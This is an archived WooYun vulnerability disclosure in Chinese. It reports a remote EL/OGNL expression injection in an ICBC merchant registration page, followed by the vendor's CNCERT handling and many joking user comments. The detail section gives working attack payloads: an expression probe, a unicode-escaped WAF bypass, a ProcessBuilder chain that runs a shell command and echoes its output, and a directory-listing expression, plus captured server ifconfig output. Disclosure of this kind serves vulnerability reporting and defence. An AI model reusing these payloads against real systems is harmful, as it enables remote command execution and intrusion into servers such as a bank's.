当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0196160

漏洞标题:工商银行某系统存在远程EL表达式注入漏洞(命令执行)

相关厂商:工商银行

漏洞作者: 猪猪侠

提交时间:2016-04-14 14:20

修复时间:2016-06-02 15:30

公开时间:2016-06-02 15:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-14: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

这个漏洞只影响有钱人,乌云欠我一个闪电

详细说明:

#1 漏洞描述
EL表达式语法允许开发人员开发自定义函数,以调用Java类的方法
#2 影响服务器
http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
#3 Paylod

groupName=1&papersType=${9999999-444}&papersValue=1&baseacct=1&retMsg=1&retCode=1


icbc1.jpg

漏洞证明:

#4 绕过WAF

http://**.**.**.**/merchant/enterprise/registerComUserForward.jhtml
companyName=999&groupName=&papersType=${"a9999abbb".toString\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1


tostring.jpg


#5 回显命令执行

groupName=1&papersType=${%23a%3d\u0028new%20java.lang.ProcessBuilder\u0028new%20java.lang.String[]{\u0027/sbin/ifconfig\u0027,\u0027-a\u0027}\u0029\u0029.start\u0028\u0029,%23b%3d%23a.getInputStream\u0028\u0029,%23c%3dnew%**.**.**.**.InputStreamReader\u0028%23b\u0029,%23d%3dnew%**.**.**.**.BufferedReader\u0028%23c\u0029,%23e%3dnew%20char[50000],%23d.read\u0028%23e\u0029,%23ringzero%3d%23context.get\u0028\u0027com.opensymphony.xwork2.dispatcher.HttpServletResponse\u0027\u0029,%23ringzero.getWriter\u0028\u0029.println\u0028%23e\u0029,%23ringzero.getWriter\u0028\u0029.flush\u0028\u0029,%23ringzero.getWriter\u0028\u0029.close\u0028\u0029}&papersValue=1&baseacct=1&retMsg=1&retCode=1


${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'/sbin/ifconfig','-a'})).start(),#b=#a.getInputStream(),#c=new **.**.**.**.InputStreamReader(#b),#d=new **.**.**.**.BufferedReader(#c),#e=new char[50000],#d.read(#e),#ringzero=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#ringzero.getWriter().println(#e),#ringzero.getWriter().flush(),#ringzero.getWriter().close()}


eth5      Link encap:Ethernet  HWaddr 00:50:56:97:7A:74  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5603928546 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8131434126 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:735168104896 (701110.9 Mb)  TX bytes:11750604019014 (11206249.2 Mb)
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:51371053 errors:0 dropped:0 overruns:0 frame:0
          TX packets:51371053 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:25387430681 (24211.3 Mb)  TX bytes:25387430681 (24211.3 Mb)


ifconfig.png


#6 列目录

groupName=1&papersType=${new **.**.**.**.File(\u0027/\u0027).listFiles()[1]}&papersValue=1&baseacct=1&retMsg=1&retCode=1

修复方案:

# 表达式不允许来自客户端调用

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-18 15:23

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-14 14:33 | 牛 小 帅 ( 普通白帽子 | Rank:1553 漏洞数:373 | bye)

    黑阔

  2. 2016-04-14 14:34 | cwkiller ( 普通白帽子 | Rank:121 漏洞数:33 | 闭关修炼)

    我再也不欠你什么了

  3. 2016-04-14 14:35 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个漏洞只影响有钱人,大富大贵洞

  4. 2016-04-14 14:36 | PiaCa ( 普通白帽子 | Rank:137 漏洞数:11 | 简单点!啪......嚓~~)

    富贵洞

  5. 2016-04-14 14:39 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹!)

    吓得我抓紧看看卡里余额有没有少

  6. 2016-04-14 14:43 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    -

  7. 2016-04-14 14:44 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    大富大贵洞 吓得我差点把卡里俩毛钱取出来

  8. 2016-04-14 14:45 | 路人毛 ( 普通白帽子 | Rank:153 漏洞数:64 | 要想Rank给高,标题一定得屌)

    !!!!

  9. 2016-04-14 14:58 | 浩天 认证白帽子 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    好姿势

  10. 2016-04-14 15:00 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    我表示关注

  11. 2016-04-14 15:04 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    哈喇子

  12. 2016-04-14 15:05 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的,只有不想做的)

    唉 我是说我卡里怎么扫了18块 原来如此啊

  13. 2016-04-14 15:06 | SREAUDIO ( 实习白帽子 | Rank:38 漏洞数:11 | 努力学习,磨练技术)

    @浩天 我有一个漏洞5天了还没审,求教

  14. 2016-04-14 15:11 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    吓得我赶紧看看卡里余额有没有多!

  15. 2016-04-14 15:11 | sysALong ( 普通白帽子 | Rank:386 漏洞数:76 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    就这 JC 还不查水表? 那就奇怪了。

  16. 2016-04-14 15:14 | Taro ( 普通白帽子 | Rank:329 漏洞数:81 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    嚇得我都不管是用工商銀行卡了

  17. 2016-04-14 15:18 | Martial ( 普通白帽子 | Rank:2616 漏洞数:366 | 竟然还有人冒充我,醉了,骗子QQ445697541...)

    这个漏洞只影响有钱人,大家可以放心了 - -~!

  18. 2016-04-14 15:35 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    我收到我的银行卡消费信息,吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在,真是吓死人了!

  19. 2016-04-14 15:51 | xxsec ( 路人 | Rank:10 漏洞数:8 | kali,metasploit)

    吓死我了,赶紧狂奔到银行查了下卡里的2块3毛8···

  20. 2016-04-14 16:03 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

    你裤腿侧面破了吧

  21. 2016-04-14 16:17 | 路人毛 ( 普通白帽子 | Rank:153 漏洞数:64 | 要想Rank给高,标题一定得屌)

    @苏安泽 你自行车呢?

  22. 2016-04-14 16:22 | by黑桃 ( 实习白帽子 | Rank:95 漏洞数:37 | 昨晚和老公大吵了一架,今天早上来大夷妈了...)

    把楼上的人全部带走

  23. 2016-04-14 16:33 | 兔八哥 ( 实习白帽子 | Rank:41 漏洞数:6 | 我心飞 翔)

    我卡里也有好几块啊,在村里也算是有钱人了,要不要报警,急,在线等

  24. 2016-04-14 16:47 | 乐乐 ( 普通白帽子 | Rank:223 漏洞数:62 | 一名信息安全员)

    也来围观一下

  25. 2016-04-14 16:57 | xiya ( 路人 | Rank:5 漏洞数:1 )

    要不要报警,急,在线等

  26. 2016-04-14 17:07 | 0h1in9e ( 实习白帽子 | Rank:56 漏洞数:20 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    吓得我赶紧看看卡里余额有没有多!

  27. 2016-04-14 17:37 | 睾大强 ( 路人 | Rank:6 漏洞数:3 | there are five stages,denial,then anger,...)

    什么时候能影响我啊 求备影响

  28. 2016-04-14 17:43 | socket ( 实习白帽子 | Rank:53 漏洞数:20 | )

    666搞银行。。

  29. 2016-04-14 19:39 | 白骨夫人 ( 普通白帽子 | Rank:236 漏洞数:53 | 白骨夫人,白只做白的,骨就是骨气,夫人就...)

    牛逼啊 ,,, 混个熟脸

  30. 2016-04-14 19:49 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    好牛逼

  31. 2016-04-14 20:00 | 听听鸟叫 ( 路人 | Rank:14 漏洞数:4 | 看看天空)

    沾点牛气

  32. 2016-04-14 22:03 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    @白骨夫人

  33. 2016-04-14 22:28 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    @路人毛 卖了

  34. 2016-04-19 07:58 | J3c0sk ( 路人 | Rank:4 漏洞数:2 | *)

    等死吧,劳资已经报警了